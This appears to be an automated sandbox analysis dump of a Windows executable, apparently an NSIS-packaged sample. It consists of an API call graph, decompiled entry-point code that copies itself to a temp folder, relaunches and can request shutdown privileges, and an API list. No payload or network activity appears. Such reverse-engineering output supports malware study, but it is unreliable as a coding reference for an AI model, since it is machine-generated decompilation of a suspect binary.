4457->4458 4460 40492a SetDlgItemTextW 4458->4460 4461 40494f 4459->4461 4460->4456 4462 40190f 4463 402da6 17 API calls 4462->4463 4464 401916 4463->4464 4465 405b67 MessageBoxIndirectW 4464->4465 4466 40191f 4465->4466 4467 401491 4468 405569 24 API calls 4467->4468 4469 401498 4468->4469 4470 402891 4471 402898 4470->4471 4474 402ba9 4470->4474 4472 402d84 17 API calls 4471->4472 4473 40289f 4472->4473 4475 4028ae SetFilePointer 4473->4475 4475->4474 4476 4028be 4475->4476 4478 40644e wsprintfW 4476->4478 4478->4474 4479 401f12 4480 402da6 17 API calls 4479->4480 4481 401f18 4480->4481 4482 402da6 17 API calls 4481->4482 4483 401f21 4482->4483 4484 402da6 17 API calls 4483->4484 4485 401f2a 4484->4485 4486 402da6 17 API calls 4485->4486 4487 401f33 4486->4487 4488 401423 24 API calls 4487->4488 4489 401f3a 4488->4489 4496 405b2d ShellExecuteExW 4489->4496 4491 401f82 4492 40292e 4491->4492 4493 40697f 5 API calls 4491->4493 4494 401f9f CloseHandle 4493->4494 4494->4492 4496->4491 4497 402f93 4498 402fa5 SetTimer 4497->4498 4499 402fbe 4497->4499 4498->4499 4500 403013 4499->4500 4501 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4499->4501 4501->4500 4502 401d17 4503 402d84 17 API calls 4502->4503 4504 401d1d IsWindow 4503->4504 4505 401a20 4504->4505 4506 404599 lstrcpynW lstrlenW 4507 401b9b 4508 401ba8 4507->4508 4509 401bec 4507->4509 4510 401c31 4508->4510 4515 401bbf 4508->4515 4511 401bf1 4509->4511 4512 401c16 GlobalAlloc 4509->4512 4513 406544 17 API calls 4510->4513 4519 40239d 4510->4519 4511->4519 4528 406507 lstrcpynW 4511->4528 4514 406544 17 API calls 4512->4514 4517 402397 4513->4517 4514->4510 4526 406507 lstrcpynW 4515->4526 4522 405b67 MessageBoxIndirectW 4517->4522 4520 401c03 GlobalFree 4520->4519 4521 401bce 4527 406507 lstrcpynW 4521->4527 4522->4519 4524 401bdd 4529 406507 lstrcpynW 4524->4529 4526->4521 4527->4524 4528->4520 4529->4519 4530 40261c 4531 402da6 17 API calls 4530->4531 4532 402623 4531->4532 4535 405ff7 
GetFileAttributesW CreateFileW 4532->4535 4534 40262f 4535->4534 4543 40149e 4544 4014ac PostQuitMessage 4543->4544 4545 40239d 4543->4545 4544->4545 4546 40259e 4556 402de6 4546->4556 4549 402d84 17 API calls 4550 4025b1 4549->4550 4551 40292e 4550->4551 4552 4025d9 RegEnumValueW 4550->4552 4553 4025cd RegEnumKeyW 4550->4553 4554 4025ee RegCloseKey 4552->4554 4553->4554 4554->4551 4557 402da6 17 API calls 4556->4557 4558 402dfd 4557->4558 4559 406374 RegOpenKeyExW 4558->4559 4560 4025a8 4559->4560 4560->4549 4561 404622 4562 40463a 4561->4562 4569 404754 4561->4569 4566 404463 18 API calls 4562->4566 4563 4047be 4564 404888 4563->4564 4565 4047c8 GetDlgItem 4563->4565 4572 4044ca 8 API calls 4564->4572 4567 4047e2 4565->4567 4568 404849 4565->4568 4571 4046a1 4566->4571 4567->4568 4576 404808 SendMessageW LoadCursorW SetCursor 4567->4576 4568->4564 4577 40485b 4568->4577 4569->4563 4569->4564 4570 40478f GetDlgItem SendMessageW 4569->4570 4594 404485 EnableWindow 4570->4594 4574 404463 18 API calls 4571->4574 4575 404883 4572->4575 4579 4046ae CheckDlgButton 4574->4579 4595 4048d1 4576->4595 4581 404871 4577->4581 4582 404861 SendMessageW 4577->4582 4578 4047b9 4584 4048ad SendMessageW 4578->4584 4592 404485 EnableWindow 4579->4592 4581->4575 4583 404877 SendMessageW 4581->4583 4582->4581 4583->4575 4584->4563 4587 4046cc GetDlgItem 4593 404498 SendMessageW 4587->4593 4589 4046e2 SendMessageW 4590 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4589->4590 4591 4046ff GetSysColor 4589->4591 4590->4575 4591->4590 4592->4587 4593->4589 4594->4578 4598 405b2d ShellExecuteExW 4595->4598 4597 404837 LoadCursorW SetCursor 4597->4568 4598->4597 4599 4015a3 4600 402da6 17 API calls 4599->4600 4601 4015aa SetFileAttributesW 4600->4601 4602 4015bc 4601->4602 3538 401fa4 3539 402da6 17 API calls 3538->3539 3540 401faa 3539->3540 3541 405569 24 API calls 3540->3541 3542 401fb4 3541->3542 3553 405aea CreateProcessW 3542->3553 3545 401fdd CloseHandle 3548 
40292e 3545->3548 3549 401fcf 3550 401fd4 3549->3550 3551 401fdf 3549->3551 3561 40644e wsprintfW 3550->3561 3551->3545 3554 401fba 3553->3554 3555 405b1d CloseHandle 3553->3555 3554->3545 3554->3548 3556 40697f WaitForSingleObject 3554->3556 3555->3554 3557 406999 3556->3557 3558 4069ab GetExitCodeProcess 3557->3558 3562 406910 3557->3562 3558->3549 3561->3545 3563 40692d PeekMessageW 3562->3563 3564 406923 DispatchMessageW 3563->3564 3565 40693d WaitForSingleObject 3563->3565 3564->3563 3565->3557 4603 4056a8 4604 405852 4603->4604 4605 4056c9 GetDlgItem GetDlgItem GetDlgItem 4603->4605 4606 405883 4604->4606 4607 40585b GetDlgItem CreateThread CloseHandle 4604->4607 4648 404498 SendMessageW 4605->4648 4610 4058ae 4606->4610 4611 4058d3 4606->4611 4612 40589a ShowWindow ShowWindow 4606->4612 4607->4606 4609 405739 4614 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4609->4614 4613 40590e 4610->4613 4616 4058c2 4610->4616 4617 4058e8 ShowWindow 4610->4617 4618 4044ca 8 API calls 4611->4618 4650 404498 SendMessageW 4612->4650 4613->4611 4621 40591c SendMessageW 4613->4621 4619 405792 SendMessageW SendMessageW 4614->4619 4620 4057ae 4614->4620 4622 40443c SendMessageW 4616->4622 4624 405908 4617->4624 4625 4058fa 4617->4625 4623 4058e1 4618->4623 4619->4620 4627 4057c1 4620->4627 4628 4057b3 SendMessageW 4620->4628 4621->4623 4629 405935 CreatePopupMenu 4621->4629 4622->4611 4626 40443c SendMessageW 4624->4626 4630 405569 24 API calls 4625->4630 4626->4613 4632 404463 18 API calls 4627->4632 4628->4627 4631 406544 17 API calls 4629->4631 4630->4624 4633 405945 AppendMenuW 4631->4633 4634 4057d1 4632->4634 4635 405962 GetWindowRect 4633->4635 4636 405975 TrackPopupMenu 4633->4636 4637 4057da ShowWindow 4634->4637 4638 40580e GetDlgItem SendMessageW 4634->4638 4635->4636 4636->4623 4639 405990 4636->4639 4640 4057f0 ShowWindow 4637->4640 4641 4057fd 4637->4641 4638->4623 4642 405835 SendMessageW SendMessageW 4638->4642 4643 4059ac SendMessageW 
4639->4643 4640->4641 4649 404498 SendMessageW 4641->4649 4642->4623 4643->4643 4644 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4643->4644 4646 4059ee SendMessageW 4644->4646 4646->4646 4647 405a17 GlobalUnlock SetClipboardData CloseClipboard 4646->4647 4647->4623 4648->4609 4649->4638 4650->4610 4651 40202a 4652 402da6 17 API calls 4651->4652 4653 402031 4652->4653 4654 4068d4 5 API calls 4653->4654 4655 402040 4654->4655 4656 4020cc 4655->4656 4657 40205c GlobalAlloc 4655->4657 4657->4656 4658 402070 4657->4658 4659 4068d4 5 API calls 4658->4659 4660 402077 4659->4660 4661 4068d4 5 API calls 4660->4661 4662 402081 4661->4662 4662->4656 4666 40644e wsprintfW 4662->4666 4664 4020ba 4667 40644e wsprintfW 4664->4667 4666->4664 4667->4656 4668 40252a 4669 402de6 17 API calls 4668->4669 4670 402534 4669->4670 4671 402da6 17 API calls 4670->4671 4672 40253d 4671->4672 4673 402548 RegQueryValueExW 4672->4673 4675 40292e 4672->4675 4674 402568 4673->4674 4676 40256e RegCloseKey 4673->4676 4674->4676 4679 40644e wsprintfW 4674->4679 4676->4675 4679->4676 4680 404caa 4681 404cd6 4680->4681 4682 404cba 4680->4682 4684 404d09 4681->4684 4685 404cdc SHGetPathFromIDListW 4681->4685 4691 405b4b GetDlgItemTextW 4682->4691 4687 404cf3 SendMessageW 4685->4687 4688 404cec 4685->4688 4686 404cc7 SendMessageW 4686->4681 4687->4684 4689 40140b 2 API calls 4688->4689 4689->4687 4691->4686 4692 4021aa 4693 402da6 17 API calls 4692->4693 4694 4021b1 4693->4694 4695 402da6 17 API calls 4694->4695 4696 4021bb 4695->4696 4697 402da6 17 API calls 4696->4697 4698 4021c5 4697->4698 4699 402da6 17 API calls 4698->4699 4700 4021cf 4699->4700 4701 402da6 17 API calls 4700->4701 4702 4021d9 4701->4702 4703 402218 CoCreateInstance 4702->4703 4704 402da6 17 API calls 4702->4704 4707 402237 4703->4707 4704->4703 4705 401423 24 API calls 4706 4022f6 4705->4706 4707->4705 4707->4706 4708 401a30 4709 402da6 17 API calls 4708->4709 4710 401a39 ExpandEnvironmentStringsW 4709->4710 4711 
401a4d 4710->4711 4713 401a60 4710->4713 4712 401a52 lstrcmpW 4711->4712 4711->4713 4712->4713 4719 4023b2 4720 4023c0 4719->4720 4721 4023ba 4719->4721 4723 4023ce 4720->4723 4724 402da6 17 API calls 4720->4724 4722 402da6 17 API calls 4721->4722 4722->4720 4725 4023dc 4723->4725 4726 402da6 17 API calls 4723->4726 4724->4723 4727 402da6 17 API calls 4725->4727 4726->4725 4728 4023e5 WritePrivateProfileStringW 4727->4728 4736 402434 4737 402467 4736->4737 4738 40243c 4736->4738 4739 402da6 17 API calls 4737->4739 4740 402de6 17 API calls 4738->4740 4741 40246e 4739->4741 4742 402443 4740->4742 4747 402e64 4741->4747 4744 402da6 17 API calls 4742->4744 4746 40247b 4742->4746 4745 402454 RegDeleteValueW RegCloseKey 4744->4745 4745->4746 4748 402e78 4747->4748 4750 402e71 4747->4750 4748->4750 4751 402ea9 4748->4751 4750->4746 4752 406374 RegOpenKeyExW 4751->4752 4753 402ed7 4752->4753 4754 402ee7 RegEnumValueW 4753->4754 4761 402f81 4753->4761 4763 402f0a 4753->4763 4755 402f71 RegCloseKey 4754->4755 4754->4763 4755->4761 4756 402f46 RegEnumKeyW 4757 402f4f RegCloseKey 4756->4757 4756->4763 4758 4068d4 5 API calls 4757->4758 4759 402f5f 4758->4759 4759->4761 4762 402f63 RegDeleteKeyW 4759->4762 4760 402ea9 6 API calls 4760->4763 4761->4750 4762->4761 4763->4755 4763->4756 4763->4757 4763->4760 4771 401735 4772 402da6 17 API calls 4771->4772 4773 40173c SearchPathW 4772->4773 4774 401757 4773->4774 4775 401d38 4776 402d84 17 API calls 4775->4776 4777 401d3f 4776->4777 4778 402d84 17 API calls 4777->4778 4779 401d4b GetDlgItem 4778->4779 4780 402638 4779->4780 4781 4014b8 4782 4014be 4781->4782 4783 401389 2 API calls 4782->4783 4784 4014c6 4783->4784 4792 40263e 4793 402652 4792->4793 4794 40266d 4792->4794 4797 402d84 17 API calls 4793->4797 4795 402672 4794->4795 4796 40269d 4794->4796 4798 402da6 17 API calls 4795->4798 4799 402da6 17 API calls 4796->4799 4804 402659 4797->4804 4800 402679 4798->4800 4801 4026a4 lstrlenW 4799->4801 4809 406529 WideCharToMultiByte 
4800->4809 4801->4804 4803 40268d lstrlenA 4803->4804 4805 4026e7 4804->4805 4806 4026d1 4804->4806 4808 4060d8 5 API calls 4804->4808 4806->4805 4807 4060a9 WriteFile 4806->4807 4807->4805 4808->4806 4809->4803

                                  Control-flow Graph (graph image not recoverable; legend: Executed / Not Executed)
                                  C-Code - Quality: 78%
                                  			_entry_() {
                                  				WCHAR* _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				int _v24;
                                  				int _v28;
                                  				struct _TOKEN_PRIVILEGES _v40;
                                  				signed char _v42;
                                  				int _v44;
                                  				signed int _v48;
                                  				intOrPtr _v278;
                                  				signed short _v310;
                                  				struct _OSVERSIONINFOW _v324;
                                  				struct _SHFILEINFOW _v1016;
                                  				intOrPtr* _t88;
                                  				WCHAR* _t92;
                                  				char* _t94;
                                  				void _t97;
                                  				void* _t116;
                                  				WCHAR* _t118;
                                  				signed int _t119;
                                  				intOrPtr* _t123;
                                  				void* _t137;
                                  				void* _t143;
                                  				void* _t148;
                                  				void* _t152;
                                  				void* _t157;
                                  				signed int _t167;
                                  				void* _t170;
                                  				void* _t175;
                                  				intOrPtr _t177;
                                  				intOrPtr _t178;
                                  				intOrPtr* _t179;
                                  				int _t188;
                                  				void* _t189;
                                  				void* _t198;
                                  				signed int _t204;
                                  				signed int _t209;
                                  				signed int _t214;
                                  				signed int _t216;
                                  				int* _t218;
                                  				signed int _t226;
                                  				signed int _t229;
                                  				CHAR* _t231;
                                  				char* _t232;
                                  				signed int _t233;
                                  				WCHAR* _t234;
                                  				void* _t250;
                                  
                                  				_t216 = 0x20;
                                  				_t188 = 0;
                                  				_v24 = 0;
                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                  				_v20 = 0;
                                  				SetErrorMode(0x8001); // executed
                                  				_v324.szCSDVersion = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                  				if(GetVersionExW( &_v324) == 0) {
                                  					_v324.dwOSVersionInfoSize = 0x114;
                                  					GetVersionExW( &_v324);
                                  					asm("sbb eax, eax");
                                  					_v42 = 4;
                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                  				}
                                  				if(_v324.dwMajorVersion < 0xa) {
                                  					_v310 = _v310 & 0x00000000;
                                  				}
                                  				 *0x42a2d8 = _v324.dwBuildNumber;
                                  				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                  				if( *0x42a2de != 0x600) {
                                  					_t179 = E004068D4(_t188);
                                  					if(_t179 != _t188) {
                                  						 *_t179(0xc00);
                                  					}
                                  				}
                                  				_t231 = "UXTHEME";
                                  				do {
                                  					E00406864(_t231); // executed
                                  					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                  				} while ( *_t231 != 0);
                                  				E004068D4(0xb);
                                  				 *0x42a224 = E004068D4(9);
                                  				_t88 = E004068D4(7);
                                  				if(_t88 != _t188) {
                                  					_t88 =  *_t88(0x1e);
                                  					if(_t88 != 0) {
                                  						 *0x42a2dc =  *0x42a2dc | 0x00000080;
                                  					}
                                  				}
                                  				__imp__#17();
                                  				__imp__OleInitialize(_t188); // executed
                                  				 *0x42a2e0 = _t88;
                                  				SHGetFileInfoW(0x4216c8, _t188,  &_v1016, 0x2b4, _t188); // executed
                                  				E00406507(0x429220, L"NSIS Error");
                                  				_t92 = GetCommandLineW();
                                  				_t232 = L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ";
                                  				E00406507(_t232, _t92);
                                  				_t94 = _t232;
                                  				_t233 = 0x22;
                                  				 *0x42a220 = 0x400000;
                                  				_t250 = L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" " - _t233; // 0x22
                                  				if(_t250 == 0) {
                                  					_t216 = _t233;
                                  					_t94 =  &M00435002;
                                  				}
                                  				_t198 = CharNextW(E00405E03(_t94, _t216));
                                  				_v16 = _t198;
                                  				while(1) {
                                  					_t97 =  *_t198;
                                  					_t251 = _t97 - _t188;
                                  					if(_t97 == _t188) {
                                  						break;
                                  					}
                                  					_t209 = 0x20;
                                  					__eflags = _t97 - _t209;
                                  					if(_t97 != _t209) {
                                  						L17:
                                  						__eflags =  *_t198 - _t233;
                                  						_v12 = _t209;
                                  						if( *_t198 == _t233) {
                                  							_v12 = _t233;
                                  							_t198 = _t198 + 2;
                                  							__eflags = _t198;
                                  						}
                                  						__eflags =  *_t198 - 0x2f;
                                  						if( *_t198 != 0x2f) {
                                  							L32:
                                  							_t198 = E00405E03(_t198, _v12);
                                  							__eflags =  *_t198 - _t233;
                                  							if(__eflags == 0) {
                                  								_t198 = _t198 + 2;
                                  								__eflags = _t198;
                                  							}
                                  							continue;
                                  						} else {
                                  							_t198 = _t198 + 2;
                                  							__eflags =  *_t198 - 0x53;
                                  							if( *_t198 != 0x53) {
                                  								L24:
                                  								asm("cdq");
                                  								asm("cdq");
                                  								_t214 = L"NCRC" & 0x0000ffff;
                                  								asm("cdq");
                                  								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                                  								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                                  								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                                  									L29:
                                  									asm("cdq");
                                  									asm("cdq");
                                  									_t209 = L" /D=" & 0x0000ffff;
                                  									asm("cdq");
                                  									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                                  									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                                  									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                                  										L31:
                                  										_t233 = 0x22;
                                  										goto L32;
                                  									}
                                  									__eflags =  *_t198 - _t229;
                                  									if( *_t198 == _t229) {
                                  										 *(_t198 - 4) = _t188;
                                  										__eflags = _t198;
                                  										E00406507(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
                                  										L37:
                                  										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                  										GetTempPathW(0x400, _t234);
                                  										_t116 = E004034C6(_t198, _t251);
                                  										_t252 = _t116;
                                  										if(_t116 != 0) {
                                  											L40:
                                  											DeleteFileW(L"1033"); // executed
                                  											_t118 = E0040307D(_t254, _v20); // executed
                                  											_v8 = _t118;
                                  											if(_t118 != _t188) {
                                  												L68:
                                  												ExitProcess(); // executed
                                  												__imp__OleUninitialize(); // executed
                                  												if(_v8 == _t188) {
                                  													if( *0x42a2b4 == _t188) {
                                  														L77:
                                  														_t119 =  *0x42a2cc;
                                  														if(_t119 != 0xffffffff) {
                                  															_v24 = _t119;
                                  														}
                                  														ExitProcess(_v24);
                                  													}
                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                  														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                  														_v40.PrivilegeCount = 1;
                                  														_v28 = 2;
                                  														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                  													}
                                  													_t123 = E004068D4(4);
                                  													if(_t123 == _t188) {
                                  														L75:
                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                  															goto L77;
                                  														}
                                  														goto L76;
                                  													} else {
                                  														_push(0x80040002);
                                  														_push(0x25);
                                  														_push(_t188);
                                  														_push(_t188);
                                  														_push(_t188);
                                  														if( *_t123() == 0) {
                                  															L76:
                                  															E0040140B(9);
                                  															goto L77;
                                  														}
                                  														goto L75;
                                  													}
                                  												}
                                  												E00405B67(_v8, 0x200010);
                                  												ExitProcess(2);
                                  											}
                                  											if( *0x42a23c == _t188) {
                                  												L51:
                                  												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
                                  												_v24 = E00403BB6(_t264);
                                  												goto L68;
                                  											}
                                  											_t218 = E00405E03(L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ", _t188);
                                  											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ") {
                                  												L48:
                                  												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ";
                                  												_v8 = L"Error launching installer";
                                  												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ") {
                                  													_t189 = E00405AD2(__eflags);
                                  													lstrcatW(_t234, L"~nsu");
                                  													__eflags = _t189;
                                  													if(_t189 != 0) {
                                  														lstrcatW(_t234, "A");
                                  													}
                                  													lstrcatW(_t234, L".tmp");
                                  													_t137 = lstrcmpiW(_t234, 0x436800);
                                  													__eflags = _t137;
                                  													if(_t137 == 0) {
                                  														L67:
                                  														_t188 = 0;
                                  														__eflags = 0;
                                  														goto L68;
                                  													} else {
                                  														__eflags = _t189;
                                  														_push(_t234);
                                  														if(_t189 == 0) {
                                  															E00405AB5();
                                  														} else {
                                  															E00405A38();
                                  														}
                                  														SetCurrentDirectoryW(_t234);
                                  														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                  														if(__eflags == 0) {
                                  															E00406507(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x436800);
                                  														}
                                  														E00406507(0x42b000, _v16);
                                  														_t201 = "A" & 0x0000ffff;
                                  														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                  														__eflags = _t143;
                                  														_v12 = 0x1a;
                                  														 *0x42b800 = _t143;
                                  														do {
                                  															E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
                                  															DeleteFileW(0x420ec8);
                                  															__eflags = _v8;
                                  															if(_v8 != 0) {
                                  																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\4505682666.exe", 0x420ec8, 1);
                                  																__eflags = _t148;
                                  																if(_t148 != 0) {
                                  																	E004062C7(_t201, 0x420ec8, 0);
                                  																	E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
                                  																	_t152 = E00405AEA(0x420ec8);
                                  																	__eflags = _t152;
                                  																	if(_t152 != 0) {
                                  																		CloseHandle(_t152);
                                  																		_v8 = 0;
                                  																	}
                                  																}
                                  															}
                                  															 *0x42b800 =  *0x42b800 + 1;
                                  															_t61 =  &_v12;
                                  															 *_t61 = _v12 - 1;
                                  															__eflags =  *_t61;
                                  														} while ( *_t61 != 0);
                                  														E004062C7(_t201, _t234, 0);
                                  														goto L67;
                                  													}
                                  												}
                                  												 *_t218 = _t188;
                                  												_t221 =  &(_t218[2]);
                                  												_t157 = E00405EDE(_t263,  &(_t218[2]));
                                  												_t264 = _t157;
                                  												if(_t157 == 0) {
                                  													goto L68;
                                  												}
                                  												E00406507(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                                  												E00406507(0x436000, _t221);
                                  												_v8 = _t188;
                                  												goto L51;
                                  											}
                                  											asm("cdq");
                                  											asm("cdq");
                                  											asm("cdq");
                                  											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                  											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                  											while( *_t218 != _t204 || _t218[1] != _t167) {
                                  												_t218 = _t218;
                                  												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\4505682666.exe\" ") {
                                  													continue;
                                  												}
                                  												break;
                                  											}
                                  											_t188 = 0;
                                  											goto L48;
                                  										}
                                  										GetWindowsDirectoryW(_t234, 0x3fb);
                                  										lstrcatW(_t234, L"\\Temp");
                                  										_t170 = E004034C6(_t198, _t252);
                                  										_t253 = _t170;
                                  										if(_t170 != 0) {
                                  											goto L40;
                                  										}
                                  										GetTempPathW(0x3fc, _t234);
                                  										lstrcatW(_t234, L"Low");
                                  										SetEnvironmentVariableW(L"TEMP", _t234);
                                  										SetEnvironmentVariableW(L"TMP", _t234);
                                  										_t175 = E004034C6(_t198, _t253);
                                  										_t254 = _t175;
                                  										if(_t175 == 0) {
                                  											goto L68;
                                  										}
                                  										goto L40;
                                  									}
                                  									goto L31;
                                  								}
                                  								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                  								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                  									goto L29;
                                  								}
                                  								_t177 =  *((intOrPtr*)(_t198 + 8));
                                  								__eflags = _t177 - 0x20;
                                  								if(_t177 == 0x20) {
                                  									L28:
                                  									_t36 =  &_v20;
                                  									 *_t36 = _v20 | 0x00000004;
                                  									__eflags =  *_t36;
                                  									goto L29;
                                  								}
                                  								__eflags = _t177 - _t188;
                                  								if(_t177 != _t188) {
                                  									goto L29;
                                  								}
                                  								goto L28;
                                  							}
                                  							_t178 =  *((intOrPtr*)(_t198 + 2));
                                  							__eflags = _t178 - _t209;
                                  							if(_t178 == _t209) {
                                  								L23:
                                  								 *0x42a2c0 = 1;
                                  								goto L24;
                                  							}
                                  							__eflags = _t178 - _t188;
                                  							if(_t178 != _t188) {
                                  								goto L24;
                                  							}
                                  							goto L23;
                                  						}
                                  					} else {
                                  						goto L16;
                                  					}
                                  					do {
                                  						L16:
                                  						_t198 = _t198 + 2;
                                  						__eflags =  *_t198 - _t209;
                                  					} while ( *_t198 == _t209);
                                  					goto L17;
                                  				}
                                  				goto L37;
                                  			}
                                  0x00403a71
                                  0x00403a82
                                  0x00403a89
                                  0x00403a90
                                  0x00403a90
                                  0x00403a98
                                  0x00403aa4
                                  0x00403ab2
                                  0x00403abd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403aa6
                                  0x00403aa6
                                  0x00403aa7
                                  0x00403aa9
                                  0x00403aaa
                                  0x00403aab
                                  0x00403ab0
                                  0x00403abf
                                  0x00403ac1
                                  0x00000000
                                  0x00403ac1
                                  0x00000000
                                  0x00403ab0
                                  0x00403aa4
                                  0x00403a3b
                                  0x00403a42
                                  0x00403a42
                                  0x00403858
                                  0x004038ff
                                  0x004038ff
                                  0x0040390b
                                  0x00000000
                                  0x0040390b
                                  0x00403869
                                  0x00403871
                                  0x004038c3
                                  0x004038c3
                                  0x004038c9
                                  0x004038d0
                                  0x0040391e
                                  0x00403920
                                  0x00403925
                                  0x00403927
                                  0x0040392f
                                  0x0040392f
                                  0x0040393a
                                  0x00403946
                                  0x0040394c
                                  0x0040394e
                                  0x00403a21
                                  0x00403a21
                                  0x00403a21
                                  0x00000000
                                  0x00403954
                                  0x00403954
                                  0x00403956
                                  0x00403957
                                  0x00403960
                                  0x00403959
                                  0x00403959
                                  0x00403959
                                  0x00403966
                                  0x0040396e
                                  0x00403975
                                  0x0040397d
                                  0x0040397d
                                  0x0040398a
                                  0x00403996
                                  0x004039a0
                                  0x004039a0
                                  0x004039a2
                                  0x004039a9
                                  0x004039b3
                                  0x004039bf
                                  0x004039c5
                                  0x004039cb
                                  0x004039ce
                                  0x004039d8
                                  0x004039de
                                  0x004039e0
                                  0x004039e4
                                  0x004039f5
                                  0x004039fb
                                  0x00403a00
                                  0x00403a02
                                  0x00403a05
                                  0x00403a0b
                                  0x00403a0b
                                  0x00403a02
                                  0x004039e0
                                  0x00403a0e
                                  0x00403a15
                                  0x00403a15
                                  0x00403a15
                                  0x00403a15
                                  0x00403a1c
                                  0x00000000
                                  0x00403a1c
                                  0x0040394e
                                  0x004038d2
                                  0x004038d5
                                  0x004038d9
                                  0x004038de
                                  0x004038e0
                                  0x00000000
                                  0x00000000
                                  0x004038ec
                                  0x004038f7
                                  0x004038fc
                                  0x00000000
                                  0x004038fc
                                  0x0040387a
                                  0x00403892
                                  0x004038a3
                                  0x004038a4
                                  0x004038a8
                                  0x004038aa
                                  0x004038b8
                                  0x004038bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004038bf
                                  0x004038c1
                                  0x00000000
                                  0x004038c1
                                  0x004037e4
                                  0x004037f0
                                  0x004037f5
                                  0x004037fa
                                  0x004037fc
                                  0x00000000
                                  0x00000000
                                  0x00403804
                                  0x0040380c
                                  0x0040381d
                                  0x00403825
                                  0x00403827
                                  0x0040382c
                                  0x0040382e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040382e
                                  0x00000000
                                  0x0040378b
                                  0x00403734
                                  0x00403736
                                  0x00000000
                                  0x00000000
                                  0x00403738
                                  0x0040373c
                                  0x00403740
                                  0x00403747
                                  0x00403747
                                  0x00403747
                                  0x00403747
                                  0x00000000
                                  0x00403747
                                  0x00403742
                                  0x00403745
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403745
                                  0x004036de
                                  0x004036e2
                                  0x004036e5
                                  0x004036ec
                                  0x004036ec
                                  0x00000000
                                  0x004036ec
                                  0x004036e7
                                  0x004036ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004036ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004036b8
                                  0x004036b8
                                  0x004036b9
                                  0x004036ba
                                  0x004036ba
                                  0x00000000
                                  0x004036b8
                                  0x00000000

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                  • GetVersionExW.KERNEL32(?), ref: 00403543
                                  • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                  • OleInitialize.OLE32(00000000), ref: 00403634
                                  • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                  • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\4505682666.exe" ,00000020,"C:\Users\user\Desktop\4505682666.exe" ,00000000), ref: 004036A0
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
